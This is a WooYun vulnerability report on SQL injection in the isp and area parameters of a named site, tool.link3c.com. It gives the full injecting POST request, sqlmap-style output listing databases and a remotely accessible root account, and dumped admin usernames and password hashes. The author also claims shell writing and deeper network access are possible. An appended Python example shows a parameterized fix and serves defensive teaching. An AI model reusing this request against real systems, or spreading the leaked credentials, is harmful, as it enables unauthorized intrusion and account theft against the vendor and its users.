Vulnerability summary

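Bug ID: wooyun-2015-0101871

Title: MySQL injection on a 零刻数据 site, with remote root login, affecting many databases

Vendor: 零刻数据

Author: 路人甲

Submitted: 2015-03-18 12:33

Fixed: 2015-05-02 12:34

Published: 2015-05-02 12:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]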

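Vulnerability details

Disclosure status:

2015-03-18: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-05-02: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

Detailed description:

Issue: tool.link3c.com
The area and isp parameters are injectable; test the others yourself.
This one allows remote login to MySQL, the injection can write a shell directly, and it has permission to access the cloud database. There are also many administrators, so penetrating deeper into the internal network would be no trouble.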

POST /site/getDnsIp HTTP/1.1
Host: tool.link3c.com
Proxy-Connection: keep-alive
Content-Length: 277
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://tool.link3c.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://tool.link3c.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

isp=1%2c2%2c3%2c4%2c5'&area=9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C41%2C42%2C43%2C45%2C46%2C47%2C49%2C50%2C51%2C53&domain=baidu.com

CDbCommand 无法执行 SQL 语句: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND area_id IN (9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29' at line 1


available databases [8]:
[*] cloud
[*] information_schema
[*] ip022
[*] link3c
[*] mysql
[*] order
[*] performance_schema
[*] tool
database management system users [3]:
[*] 'remote_root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.4.5
back-end DBMS: MySQL >= 5.0.0
[02:08:41] [INFO] fetching columns for table 'user' in database 'order'
[02:08:41] [INFO] fetching entries for table 'user' in database 'order'
[02:08:42] [INFO] analyzing table dump for possible password hashes
[02:08:42] [INFO] recognized possible password hashes in column 'password'
[02:08:42] [WARNING] writing hashes to file '/tmp/tmpVq24gL.txt' for eventual further processing with other tools
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: order
Table: user
[1 entry]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 3  | admin    | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
Database: cloud
[8 tables]
+------------------------+
| cloud_admin            |
| cloud_down_log         |
| cloud_log              |
| cloud_moniter_by       |
| cloud_moniter_by_group |
| cloud_moniter_log      |
| cloud_moniter_server   |
| cloud_moniter_type     |
+------------------------+
+----+--------+-------------------+----------+----------------------------------+
| id | salt   | email             | username | password                         |
+----+--------+-------------------+----------+----------------------------------+
| 1  | iwmgwi | [email protected] | admin    | f570635d744dced2c5c34c95f78e05ac |
| 3  | 6jfhhl | [email protected] | David    | 638abe4873b0edcbd85743c74612964c |
+----+--------+-------------------+----------+----------------------------------+


Proof of vulnerability:

Fix:
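
The error message above shows the `isp` list being pasted into an `IN (...)` clause. The following is an added example, not part of the original report or the vendor's code, that contrasts that pattern with a validated, parameterized version. The table `dns_node`, its rows and all function names are assumptions, and SQLite stands in for MySQL so the block runs offline.

```python
import re
import sqlite3

ID_LIST = re.compile(r"[0-9]{1,9}(?:,[0-9]{1,9})*")  # digits and commas only

def parse_id_list(raw, max_items=64):
    """Turn '1,2,3' into [1, 2, 3]; reject everything else."""
    if not ID_LIST.fullmatch(raw):
        raise ValueError("id list must be comma-separated integers")
    ids = [int(part) for part in raw.split(",")]
    if len(ids) > max_items:
        raise ValueError("too many ids")
    return ids

def nodes_vulnerable(db, isp, area):
    # The pattern the error message implies: input concatenated into IN (...).
    sql = "SELECT ip FROM dns_node WHERE isp_id IN (%s) AND area_id IN (%s)" % (isp, area)
    return [row[0] for row in db.execute(sql)]

def nodes_hardened(db, isp, area):
    isp_ids, area_ids = parse_id_list(isp), parse_id_list(area)
    # One placeholder per value; the values never become part of the SQL text.
    sql = "SELECT ip FROM dns_node WHERE isp_id IN (%s) AND area_id IN (%s) ORDER BY ip" % (
        ",".join("?" * len(isp_ids)), ",".join("?" * len(area_ids)))
    return [row[0] for row in db.execute(sql, isp_ids + area_ids)]

def demo_db():
    # Constructed table and rows (hypothetical); the report does not show the real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dns_node (ip TEXT, isp_id INTEGER, area_id INTEGER)")
    db.executemany("INSERT INTO dns_node VALUES (?, ?, ?)",
                   [("192.0.2.1", 1, 9), ("192.0.2.2", 5, 10), ("192.0.2.3", 7, 9)])
    return db

def check(db, fn, isp, area):
    """Return the rows, or the name of the exception the call raised."""
    try:
        return fn(db, isp, area)
    except (ValueError, sqlite3.Error) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = demo_db()
    print(check(db, nodes_vulnerable, "1,2,3,4,5'", "9,10,11"))  # database-level syntax error
    print(check(db, nodes_hardened, "1,2,3,4,5'", "9,10,11"))    # rejected before any SQL runs
    print(check(db, nodes_hardened, "1,2,3,4,5", "9,10,11"))
```

The report's other finding, the `'remote_root'@'%'` account, is independent of this fix: the application's database account should be restricted to the hosts and schemas it needs.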

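Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or the vendor actively refused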